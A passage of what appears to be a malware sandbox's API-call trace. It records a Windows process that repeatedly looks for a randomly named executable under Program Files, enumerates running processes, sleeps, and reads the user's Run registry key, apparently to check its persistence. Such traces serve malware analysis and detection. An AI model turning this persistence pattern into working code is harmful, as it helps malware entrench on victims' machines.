DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.943] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.944] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.944] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.034] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.051] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.051] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.051] NtClose (Handle=0x14c) returned 0x0 [0254.051] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.051] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.051] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.051] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.051] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.051] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.155] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.158] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.159] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.159] NtClose (Handle=0x14c) returned 0x0 [0254.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.159] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.159] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.159] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.159] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.248] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.252] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.252] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.252] NtClose (Handle=0x14c) returned 0x0 [0254.252] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.253] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.253] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.253] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.253] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.253] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.346] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.362] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.362] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.362] NtClose (Handle=0x14c) returned 0x0 [0254.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.362] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.362] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.362] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.362] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.455] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.472] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.472] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.472] NtClose (Handle=0x14c) returned 0x0 [0254.472] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.472] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.473] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.473] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.473] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.603] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.611] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.611] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.611] NtClose (Handle=0x14c) returned 0x0 [0254.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.611] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.612] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.612] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.612] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0254.709] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0254.724] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0254.724] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0254.724] NtClose (Handle=0x14c) returned 0x0 [0254.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.724] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.724] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.724] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0254.724] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0254.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0254.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0254.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) 